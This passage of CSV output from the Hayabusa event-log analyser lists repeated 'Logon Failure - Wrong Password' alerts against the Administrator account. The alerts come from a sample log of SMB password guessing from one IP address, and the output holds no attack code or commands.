2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.200 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.700 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: 
